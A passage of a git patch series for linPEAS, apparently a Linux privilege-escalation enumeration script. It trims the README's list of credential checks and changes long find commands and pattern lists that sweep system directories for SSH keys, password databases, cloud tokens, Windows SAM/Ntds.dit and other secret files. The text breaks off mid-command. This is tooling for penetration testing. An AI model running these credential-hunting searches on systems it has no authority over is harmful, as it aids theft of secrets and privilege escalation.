From e014bf00bc740d3bbb7285b9d963fa870f40215c Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 13 Jul 2021 10:54:50 +0200 Subject: [PATCH 1/7] check_quto_flows --- linPEAS/README.md | 56 +---------------------------------------------- 1 file changed, 1 insertion(+), 55 deletions(-) diff --git a/linPEAS/README.md b/linPEAS/README.md index 0adad01..2189705 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -212,61 +212,7 @@ file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm - [x] Password policy - **Software Information** - - [x] MySQl (Version, user being configured, loging as "root:root","root:toor","root:", user hashes extraction via DB and file, possible backup user configured, credentials in config, cmd exec library) - - [x] PostgreSQL (Version, try login in "template0" and "template1" as: "postgres:", "psql:", file DBs, Config) - - [x] Apache (Version) - - [x] PHP cookies - - [x] Wordpress (Database credentials) - - [x] Drupal (Database credentials) - - [x] Moodle (Database credentials) - - [x] Tomcat (Credentials) - - [x] Mongo (Version, Credentials) - - [x] Supervisor (Credentials) - - [x] Cesi (Credentials) - - [x] Rsyncd (Credentials) - - [x] Hostapd (Credentials) - - [x] Wifi (Credentials) - - [x] Anaconda-ks (Credentials) - - [x] VNC (Credentials) - - [x] LDAP database (Credentials) - - [x] Open VPN files (Credentials) - - [x] SSH (private keys, known_hosts, authorized_hosts, authorized_keys, main config parameters in sshd_config, certificates, agents) - - [X] PAM-SSH (Unexpected "auth" values) - - [x] Cloud Credentials (credenals-AWS-, credentials.gb-GC-, legacy_credentials-GC-, access_tokens.db-GC-, accessTokens.json-Azure-, azureProfile.json-Azure-) - - [x] NFS (privilege escalation misconfiguration) - - [x] Kerberos (configuration & tickets in /tmp) - - [x] Kibana (credentials) - - [x] Logstash (Username and possible code execution) - - [x] Elasticseach (Config info and Version via port 9200) - - [x] Vault-ssh (Config values, secrets list and .vault-token files) - - [x] screen and tmux sessions - - [x] Couchdb - - [x] Redis - - [x] Dovecot - - [x] Mosquitto - - [x] Neo4j - - [x] Cloud-Init - - [x] Erlang Cookie - - [X] GVM config - - [x] IPSEC files - - [x] IRSSI config file - - [x] Keyring files - - [x] Filelliza files - - [x] Backup-manager - - [x] Splunk - - [x] Gitlab - - [x] PGP/GPG files - - [x] Vim swp files - - [x] ctr - - [x] runc - - [x] Firefox user files - - [x] Google Chrome user files - - [x] Autologin files - - [x] S/Key - - [x] YubiKey - - [x] Passwords inside pam.d - - [x] FastCGI params - - [x] SNMPD + - [x] Check out [sensitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml) - **Generic Interesting Files** - [x] SUID & SGID files From 9e98cb7b4e77fc072c72b4fbc5f32ef0c902b2ea Mon Sep 17 00:00:00 2001 From: CI-linpeas-ubuntu <> Date: Tue, 13 Jul 2021 09:15:01 +0000 Subject: [PATCH 2/7] linpeas.sh auto update --- linPEAS/linpeas.sh | 240 ++++++++++++++++++++++----------------------- 1 file changed, 120 insertions(+), 120 deletions(-) diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh index 776efea..b76361e 100755 --- a/linPEAS/linpeas.sh +++ b/linPEAS/linpeas.sh @@ -489,7 +489,7 @@ GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSys GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" GREP_IGNORE_MOUNTS="/ /|/cgroup|/var/lib/docker/|/null | proc proc |/dev/console|docker.sock" -INT_HIDDEN_FILES=".sqlite3|.db|.der|.pem|._history.|.env|.ldaprc|.github|.google_authenticator|.service|.vault-token|.keyring|.recently-used.xbel|.gnupg|.bluemix|.erlang.cookie|.jks|.bashrc|.git-credentials|.sudo_as_admin_successful|.rhosts|.mozilla|.swp|.kdbx|.pfx|.rdg|.pypirc|.socket|.p12|.gpg|.msmtprc|.pgp|.cer|.profile|.sqlite|.svn|.irssi|.timer|.crt|.ovpn|.keystore|.htpasswd|.git|.key|.plan|.lesshst|.ftpconfig|.gitconfig|.viminfo|.csr|.vnc|.cloudflared|.k5login" +INT_HIDDEN_FILES=".socket|.env|.ldaprc|.git|.vnc|.lesshst|.ovpn|.irssi|.rdg|.sqlite3|.bashrc|.bluemix|.rhosts|.vault-token|.htpasswd|.der|.gpg|.swp|.sudo_as_admin_successful|.csr|.erlang.cookie|.viminfo|.msmtprc|.db|.crt|.mozilla|.recently-used.xbel|.timer|.keystore|._history.|.sqlite|.k5login|.gnupg|.ftpconfig|.service|.pem|.profile|.jks|.pgp|.plan|.git-credentials|.kdbx|.key|.cloudflared|.p12|.cer|.keyring|.google_authenticator|.svn|.github|.gitconfig|.pypirc|.pfx" ########################################### #---------) Checks before start (---------# @@ -1045,131 +1045,131 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"system.d\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sites-enabled\" -o -name \".irssi\" -o -name \"couchdb\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"mysql\" -o -name \"neo4j\" -o -name \"seeddms*\" -o -name \"cacti\" -o -name \"ldap\" -o -name \".svn\" -o -name \".vnc\" -o -name \".cloudflared\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name 